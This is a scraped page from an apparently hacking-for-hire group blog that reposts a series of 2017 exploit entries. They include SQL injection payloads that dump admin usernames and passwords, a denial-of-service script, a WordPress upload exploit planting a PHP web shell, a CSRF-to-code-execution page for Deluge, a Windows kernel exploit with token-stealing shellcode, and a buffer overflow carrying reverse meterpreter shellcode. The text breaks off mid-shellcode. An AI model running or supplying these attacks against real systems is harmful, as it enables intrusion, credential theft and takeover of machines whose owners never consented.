Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863294483

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: Network Community Script v3.0.2 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/network-community/
# Demo: http://socialcommunityscript.com/products/business_network/
# Version: 3.0.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/refer_job_view.php?jview=[SQL]
# For example;
# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23--+-
# admin :admin_id
# admin :admin_name
# admin :username
# admin :adminpassword
# admin :email
# -1'+/*!50000union*/+select+1,2,3,4,5,6,/*!50000ConCat(*/username,/*!50000char*/(58),adminpassword),8,9,10,11,12,13,14,15,16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23+/*!50000from*/+admin--+-
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: PHP B2B Script v3.05 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/php-b2b-script/
# Demo: http://readymadeb2bscript.com/product/basic/
# Version: 3.05
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/companyinfo.php?id=[SQL]
# http://localhost/[PATH]/latest_selling_leads_details.php?bid=[SQL]
# http://localhost/[PATH]/company_profile.php?id=[SQL]
# For example;
# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24--+-
# admin :username
# admin :password
# admin_login :id
# admin_login :username
# admin_login :password
# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,/*!50000ConCat(*/username,/*!50000char*/(58),password),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24+from+admin--+-
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/
# Demo: http://74.124.215.220/~responsivematri/
# Version: 4.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/success_story.php?detail=[SQL]
# http://localhost/[PATH]/search-results.php?gender=[SQL]Male&age_from=[SQL]&age_to=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&mothertongue=[SQL]&country=[SQL]&education=[SQL]&Submit=search
# For example;
# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14,15,16,17,18,19--+-
# adminlogin :admin_id
# adminlogin :admin_username
# adminlogin :admin_password
# adminlogin :admin_email
# adminlogin :admin_usertype
# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,/*!50000ConCat(*/admin_username,/*!50000char*/(58),admin_password),11,12,13,14,15,16,17,18,19+from+adminlogin--+-
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Schools Alert Management Script v2.01 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/schools-alert-management-system/
# Demo: http://www.schoolcollageerp.com/schoolalert/
# Version: 2.01
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/view_school_list.php?list_id=[SQL]
# For example;
# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),14,15--+-
# admin :Id
# admin :AdminName
# admin :AdminPass
# admin :AdminEmail
# admin :CreatedDate
# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,/*!50000ConCat(*/AdminName,/*!50000char*/(58),AdminPass),14,15+from+admin--+-
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Select Your College Script v2.01 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/select-your-college-script/
# Demo: http://schoolcollageerp.com/selectyourcollege/
# Version: 2.01
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/searchresult.php?institute=[SQL]
# http://localhost/[PATH]/searchresult.php?namesearch&name=[SQL]
# http://localhost/[PATH]/searchcourse.php?categoryid=[SQL]
# http://localhost/[PATH]/collegedetails.php?id=[SQL]
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Social Network Script v3.01 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/social-network-script/
# Demo: http://myeliteprofile.com/
# Version: 3.01
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/[SQL]
# http://localhost/scrapbook.php?id=[SQL
# http://localhost/profile_social.php?id=[SQL
# http://localhost/my_bookmark.php?id=[SQL
# http://localhost/profile_social.php?mode=addbookmark&id=[SQL
# Etc... Etc...
# # # # #
HireHackking 
#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
#Description: The exploit cause the device to self-reboot, constituting a denial of service.
#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
#Date: March 02, 2017
#Exploit Author: Mark Liapustin & Arik Kublanov
#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
#Version: All firmware versions prior to V3.03 BN 830
#Tested on: Windows and Linux
#CVE: CVE-2017-6019

# Use this script with caution!
# Mark Liapustin: https://www.linkedin.com/in/clizsec/
# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
# =========================================================
import subprocess
import os
import sys
import time
import socket
# =========================================================

print 'Usage: python ComBoxDos.py IP PORT'
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'Argument List:', str(sys.argv)

print "ComBox Denial of Service via HTTP-POST Request"
global cmdosip
cmdosip = str(sys.argv[1])
port = int(sys.argv[2])
print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
		
print "Executing...\n\n\n"
for i in range(1, 1000):
  try:
	cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((cmdosip, port))
	print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
	s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
	s.send("Host: " + cmdosip + "\r\n\r\n")
	s.close()
  except: 
     pass
HireHackking 
# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
# Date: 06.03.2017
# Software Link: http://www.cyberghostvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
  
1. Description
 
`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

2. Proof of Concept

using System;
using CyberGhost.Communication;

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}
HireHackking 
# # # # # 
# Exploit Title: Website Broker Script v3.02 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/website-broker-script/
# Demo: http://www.officialwebsiteforsale.com/official/
# Version: 3.02
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/website_details_view.php?view=[SQL]
# For example;
# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+-
# admin_login :id
# admin_login :userid
# admin_login :password
# admin_users :user_id
# admin_users :username
# admin_users :password
# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+-
# Etc...
# # # # #
HireHackking 
import requests
import random
import string
print "---------------------------------------------------------------------"
print "Multiple  Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
print "---------------------------------------------------------------------"
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
if plug_choice=="1":
	plugin="zen-mobile-app-native"
elif plug_choice=="2":
	plugin="webapp-builder"
elif plug_choice=="3":
	plugin="wp2android-turn-wp-site-into-android-app"
elif plug_choice=="4":
	plugin="mobile-app-builder-by-wappress"
elif plug_choice=="5":
	plugin="mobile-friendly-app-builder-by-easytouch"
else:
	print "Invalid Plugin choice, I will now exit"
	quit()	
slug = "/wp-content/plugins/"+plugin+"/server/images.php"
target=victim+slug
def definShell(size=6, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

shellName= definShell()+".php"

def checkExistence():
	litmusTest = requests.get(target)
	litmusState = litmusTest.status_code
	if litmusState == 200:
		print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
		exploit()
	else:
		print "Target has a funny code & might not be vulnerable, I will now exit\n"
		quit()
	
def exploit():
	print "\nGenerating Payload: "+shellName+"\n"
	myShell = {'file': (shellName, '<?php echo system($_GET[\'alien\']); ?>')}
	shellEmUp = requests.post(target, files=myShell)
	respShell = shellEmUp.text
	cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
	shellLoc = cleanURL.replace(" ", "")
	print "Confirming shell upload by printing current user\n"
	shellTest=requests.get(shellLoc+"?alien=whoami")
	webserverUser=shellTest.text
	if webserverUser == "":
		print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
		quit()
	else:
		print "The current webserver user is: "+webserverUser+"\n"
		print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
		quit()

if __name__ == "__main__":
	checkExistence()
HireHackking 
<!--
Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13

Kyle Neideck, February 2017


Product
-------

Deluge is a BitTorrent client available from http://deluge-torrent.org.

Fix
---

Fixed in the (public) source code, but not in binary releases yet. See
http://git.deluge-torrent.org/deluge/commit/?h=develop&id=11e8957deaf0c76fdfbac62d99c8b6c61cfdddf9
and
http://git.deluge-torrent.org/deluge/commit/?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583

Install from source or use the web UI from an incognito/private window until
new binaries are released.

Summary
-------

Deluge version 1.3.13 is vulnerable to cross-site request forgery in the Web UI
plug-in resulting in remote code execution. Requests made to the /json endpoint
are not checked for CSRF. See the "render" function of the "JSON" class in
deluge/ui/web/json_api.py.

The Web UI plug-in is installed, but not enabled, by default. If the user has
enabled the Web UI plug-in and logged into it, a malicious web page can use
forged requests to make Deluge download and install a Deluge plug-in provided
by the attacker. The plug-in can then execute arbitrary code as the user
running Deluge (usually the local user account).

Timeline
--------

2017-03-01 Disclosed the vulnerability to Calum Lind (Cas) of Deluge Team
2017-03-01 Vulnerability fixed by Calum Lind
2017-03-05 Advisory released

To Reproduce
------------

 - Create/find a Deluge plug-in to be installed on the victim machine. For
   example, create an empty plug-in with
       python deluge/scripts/create_plugin.py --name malicious --basepath . \
           --author-name "n" --author-email "e"
   (see
   http://git.deluge-torrent.org/deluge/tree/deluge/scripts/create_plugin.py?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583)
   and add a line to its __init__.py to launch calc.exe.
 - Build the plug-in as a .egg (if necessary):
       python malicious/setup.py bdist_egg
 - Make a torrent containing the .egg and seed it somewhere.
 - Create a Magnet link for the torrent.
 - In the proof-of-concept page below, update the PLUGIN_NAME, PLUGIN_FILE and
   MAGNET_LINK constants.
 - Put the PoC on a web server somewhere. Serving it locally is fine.
 - In Deluge, open Preferences, go to the Plugins category and enable the Web
   UI plug-in.
 - Go to the WebUi preferences section and check "Enable web interface". The
   port should be set to 8112 by default.
 - If you're serving the PoC over HTTPS, check "Enable SSL" so its requests
   don't get blocked as mixed content. If you're not, SSL can be enabled or
   disabled.
 - Go to localhost:8112 in a browser on the victim machine and log in.
 - Open the PoC in the same browser.

The PoC sends requests to localhost:8112 that include cookies. The first
request adds the torrent, which downloads the .egg (the plug-in) to /tmp. It
then sends repeated requests to install the .egg and enable it. The attacker's
code in the plug-in runs when the plug-in is enabled.

For the attack to be successful, the PoC page must be left open until the
malicious plug-in finishes downloading. An attacker could avoid that limitation
by using the Execute plug-in, which is installed by default, but Deluge has to
be restarted before the Execute plug-in can be used. I don't think that can be
done from the web UI, so the attacker's code would only execute after the
victim restarted Deluge and then added/removed/completed a torrent.

The PoC adds the plug-in torrent using a Magnet link because it would need to
read the web UI's responses to add a .torrent file, which CORS prevents.

Proof of Concept
----------------
-->

<!--
Deluge 1.3.13 Web UI CSRF

Tested on Linux, macOS and Windows.

Kyle Neideck, February 2017
kyle@bearisdriving.com
-->
<html><body><script>
let PLUGIN_NAME = 'malicious';
let PLUGIN_FILE = 'malicious-0.1-py2.7.egg';
let MAGNET_LINK =
    'magnet:?xt=urn:btih:1b02570de69c0cb6d12c544126a32c67c79024b4' +
        '&dn=malicious-0.1-py2.7.egg' +
        '&tr=http%3A%2F%2Ftracker.example.com%3A6969%2Fannounce';

function send_deluge_json(json) {
    console.log('Sending: ' + json);

    for (let proto of ['http','https']) {
        let xhr = new XMLHttpRequest();

        xhr.open('POST', proto + '://localhost:8112/json');
        xhr.setRequestHeader('Content-Type', 'text/plain');
        xhr.withCredentials = true;
        xhr.onload = function() { console.log(xhr); };
        xhr.send(json);
    }
}

let download_location =
    (navigator.appVersion.indexOf("Win") != -1) ?
        'C:\\\\Users\\\\Public' : '/tmp';

// Download a malicious plugin using a Magnet link.
//
// Using the /upload endpoint or adding a .torrent file wouldn't work. We could
// upload the file (either a .torrent or the plug-in itself), but it would be
// saved in a temp dir with a random name. CORS would prevent us from reading
// the path to the file from the response, and to finish the process we'd need
// to send a second request that includes that path.
send_deluge_json('{' +
    '"method":"web.add_torrents",' +
    '"params":[[{' +
        '"path":"' + MAGNET_LINK + '",' +
        '"options":{' +
            '"file_priorities":[],' +
            '"add_paused":false,' +
            '"compact_allocation":false,' +
            '"download_location":"' + download_location + '",' +
            '"move_completed":false,' +
            '"move_completed_path":"' + download_location + '",' +
            '"max_connections":-1,' +
            '"max_download_speed":-1,' +
            '"max_upload_slots":-1,' +
            '"max_upload_speed":-1,' +
            '"prioritize_first_last_pieces":false}}]],' +
        '"id":12345}');

window.stop = false;

// Repeatedly try to enable the plugin, since we can't tell when it will finish
// downloading.
function try_to_add_and_enable_plugin() {
    send_deluge_json('{' +
        '"method":"web.upload_plugin",' +
        '"params":["' + PLUGIN_FILE + '","' +
            download_location + '/' + PLUGIN_FILE + '"],' +
        '"id":12345}');

    send_deluge_json('{' +
        '"method":"core.enable_plugin",' +
        '"params":["' + PLUGIN_NAME + '"],' +
        '"id":12345}');

    if (!window.stop) {
        window.setTimeout(try_to_add_and_enable_plugin, 500);
    }
}

try_to_add_and_enable_plugin();
</script>
<button onclick="window.stop = true">Stop sending requests</button>
</body></html>
HireHackking 
/*

Exploit Title    - USBPcap Null Pointer Dereference Privilege Escalation
Date             - 07th March 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://desowin.org/usbpcap/ 
Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
Driver Version   - 1.1.0.0 - USBPcap.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE ID           - CVE-2017-6178
Vendor fix url   - not yet
Fixed Version    - 0day
Fixed driver ver - 0day


USBPcap.sys
-----------

.text:992AF494 loc_992AF494:                                                         
.text:992AF494                 mov     ecx, [edi+8]                                  ; DeviceObject
.text:992AF494                                                                       
.text:992AF497                 inc     byte ptr [esi+23h]
.text:992AF49A                 add     dword ptr [esi+60h], 24h
.text:992AF49E                 mov     edx, esi                                      ; Irp
.text:992AF4A0                 call    ds:IofCallDriver                              ; IofCallDriver function called without validating values !!!
.text:992AF4A6                 push    18h                                           ; RemlockSize
.text:992AF4A8                 push    esi                                           ; Tag
.text:992AF4A9                 push    ebx                                           ; RemoveLock
.text:992AF4AA                 mov     edi, eax
.text:992AF4AC                 call    ds:IoReleaseRemoveLockEx
.text:992AF4B2                 mov     eax, edi



kd> u nt!IofCallDriver
.
.
.
82a7111b eb0c            jmp     nt!IofCallDriver+0x63 (82a71129)
82a7111d 8b4608          mov     eax,dword ptr [esi+8] ds:0023:00000008=????????        <------------ null pointer dereference
82a71120 52              push    edx
82a71121 0fb6c9          movzx   ecx,cl
82a71124 56              push    esi
82a71125 ff548838        call    dword ptr [eax+ecx*4+38h]                              <------------ control flow of execution
82a71129 5e              pop     esi
82a7112a 59              pop     ecx
82a7112b 5d              pop     ebp
82a7112c c3              ret


*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096


typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
     IN HANDLE ProcessHandle,
     IN OUT PVOID *BaseAddress,
     IN ULONG ZeroBits,
     IN OUT PULONG RegionSize,
     IN ULONG AllocationType,
     IN ULONG Protect);



// Windows 7 SP1

#define W7_KPROCESS 0x50      // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN    0xf8      // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID     0xb4      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS  0xb8      // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_w7[] =
{
  0x60,                                                  // pushad                         Saves all registers
  0x64,0xA1,0x24,0x01,0x00,0x00,                         // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,W7_KPROCESS,                                 // mov eax, [eax+W7_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax                   Current _EPROCESS structure
  0x8b,0x98,W7_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+W7_TOKEN]        Retrieves TOKEN
  0x8b,0x80,W7_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+W7_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,W7_APLINKS,0x00,0x00,0x00,                   // sub eax, W7_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+W7_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+W7_TOKEN]        Retrieves TOKEN and stores on EDX
  0x89,0x91,0xF8,0x00,0x00,0x00,                         // mov [ecx+W7_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x61,                                                  // popad                          Restores all registers
  0x83,0xc4,0x18,                                        // add esp,18
  0xc3                                                   // ret 
};





void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si); 
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
       printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
       return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}



int main(int argc, char *argv[]) 
{

    _NtAllocateVirtualMemory    NtAllocateVirtualMemory;
    LPVOID                      addrtoshell;
    NTSTATUS                    allocstatus;
    LPVOID                      base_addr = (LPVOID)0x00000001;                     
    DWORD                       written;
    int                         rwresult;
    int                         size = BUFSIZE; 
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;    
    unsigned char               buffer[BUFSIZE];    
    unsigned char               devhandle[MAX_PATH]; 



    printf("-------------------------------------------------------------------------------\n");
    printf("           USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit          \n");
    printf("                        Tested on Windows 7 SP1 (32bit)                        \n");
    printf("-------------------------------------------------------------------------------\n\n");


    sprintf(devhandle, "\\\\.\\%s", "usbpcap1");

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);

    memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));

    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
 	
    if (!NtAllocateVirtualMemory)
    {
        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
        return -1;  
    }

    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
    printf("[+] Allocating memory at [0x%p]\n", base_addr);
	 
    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (allocstatus) 
    {
        printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
        return -1;
    }
    printf("[+] NtAllocateVirtualMemory successful\n");

    memset(buffer, 0x00, BUFSIZE);
    memcpy(buffer+0x0000006b, &addrtoshell, 4);

    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);

    if (rwresult == 0)
    {
        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
        return -1;
    }
    printf("[+] WriteProcessMemory %d bytes written\n", written);  

    printf("[+] Device handle %s\n", devhandle);
    
    hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    printf("[~] Press any key to send Exploit  . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();

    return 0;
}
HireHackking 
# # # # # 
# Exploit Mini CMS v1.1 - SQL Injection
# Google Dork: N/A
# Date: 07.03.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software : http://www.icloudcenter.com/mini_cms.htm
# Demo: http://www.icloudcenter.net/demos/mini_cms/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?page=static_pages&name=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Daily Deals Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.03.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software : http://www.icloudcenter.com/daily_deals_site.htm
# Demo: http://icloudcenter.net/demos/icgroupdeals/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/deal.php?id=[SQL]
# # # # #
HireHackking 
# Exploit Title: Azure Data Expert Ultimate 2.2.16 – buffer overflow
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.azuredex.com/downloads.html
# Version: 2.2.16
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6506

# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.

import socket

# QtGui4.dll 0x6527635E - CALL ESP
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8


# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest

rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
